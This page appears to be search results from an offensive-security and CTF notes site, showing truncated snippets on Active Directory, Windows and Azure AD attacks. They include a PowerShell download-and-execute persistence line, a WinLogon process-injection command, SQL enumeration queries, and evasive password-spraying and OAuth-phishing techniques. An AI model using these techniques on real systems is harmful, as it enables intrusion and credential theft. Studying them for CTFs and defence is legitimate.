Search Results

I like otters... a lot ʕ •ᴥ•ʔ Currently focusing on honing my AD skills and recently got into AV/EDR evasion Find me on HackTheBox here and on VulnLab :)

I love cats, Active Directory and playing CTFs

Kerberoasting Kerberoasting is an attack against service accounts that allows an attacker to perform an offline password-cracking attack against the Active Directory account associated with the service. We need a valid domain user account and password. Vulnera...

User SID and RID In Active Directory, any group or user that Windows doesn't create has a RID of 1000 or greater. The last 8 bytes of RID determines the user's group. RID : 0x0105000000000005150000001c00d1bcd181f1492bdfc236f4010000 SID : 0x01050000000000051500...

Database enumeration MySQL SELECT GROUP_CONCAT(schema_name,',') FROM information_schema.schemata; SELECT GROUP_CONCAT(table_name,',') FROM information_schema.tables; SELECT GROUP_CONCAT(column_name,',') FROM information_schema.columns WHERE table_name = 'users...

Persistence on Windows The commands that include execute-assembly have been executed from a Sliver beacon but can easily be used on other C2 frameworks as well with minimal changes. Task scheduler $str = 'IEX ((new-object net.webclient).downloadstring("http:...

Windows recon Some commands are meant to be executed from a Sliver beacon but can easily be used on other C2 frameworks as well with minimal changes. Applocker Applocker policies Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections Powersh...

SeDebugPrivilege Migrate PID to privileged process such as WinLogon using ProcessInjection to load adopt. WinLogon PID: 3488 Adopt binary: adopt.exe PS /bob> dotnet inline-execute /home/user/ProcessInjection.exe /f:raw /pid:3488 /t:1 /path:C:\Windows\Tasks\ado...

Interested in everything to do with enterprise network security. Usually big fan of web and pwn too, but not very active lately.

Passionate about cybersecurity, specializing in Active Directory environments. CTF Player focused on Web, Forensics and Blockchain. You'll find me on platforms like HackTheBox and VulnLab!

Defense Evasion Useful Links Win32 API docs NTAPI Undocumented Functions Kernel-specific structures (pick the right kernel version / update) DLL download for Unhooking (download URL structure is https://msdl.microsoft.com/download/symbols/name.dll/{IMAG...

Definition Server-Side Request Forgery (SSRF) is a vulnerability that allows attackers to manipulate a server into making requests to internal or external resources, potentially gaining access to data and systems not directly reachable by the attacker. Bypass ...

Hey there! I'm interested in cybersecurity and I play CTFs as a hobby. My biggest interests are in reverse engineering and forensics. You can find me on CTF Discord servers (fsharp123), GitHub (G-flat), and Twitter (currently known as X; fsharp123). Personal a...

dirkjanm.io Blog AADInternals Blog List of Managed Identities Web applications Portal.azure.com admin.exchange.microsoft.com compliance.microsoft.com security.microsoft.com Graph Explorer Graph PWSH SDK Documentation MSOnline PWSH Module docume...

AAD (Azure Active Directory) is an identity and access management service: it allows users and applications to access resources like VMs, storage accounts or the M365 suite. All resources are maintained inside a Tenant which represent a company (like a domain ...

MS has a series of public APIs and DNS public suffixes that we can check during the enumeration phase. Enumerating with Public APIs These APIs can be used to find information about domain names, whether the domain is federated or not, if a specific user exists...

Enumerate AD tenant information admin roles and identify high-value targets in the network ADFS Resources Conditional access policies UAL (Unified Access Log) settings Service principal accounts (for single-factor logon) Storage accounts / key vaults To perf...

This attack is not complex as it only consists in "guessing" a user's password but there are still some precautions we want to take: Slow spraying to avoid account lockouts Rotating IPs via proxies and / or VPNs to avoid IP blacklisting and to bypass location...

OAUth is a protocol that allows third-party applications to access services with access tokens, avoiding the disclosure of the user's credentials. What we can do as an attacker is create a malicious OAuth app to coerce users into granting the application acces...

Device Code Authentication allows to compromise a AAD / M365 account just like OAuth Abuse but it's generally harder to detect / set up and doesn't require any input from the victim. The downside to this technique is that the device codes are valid for only a ...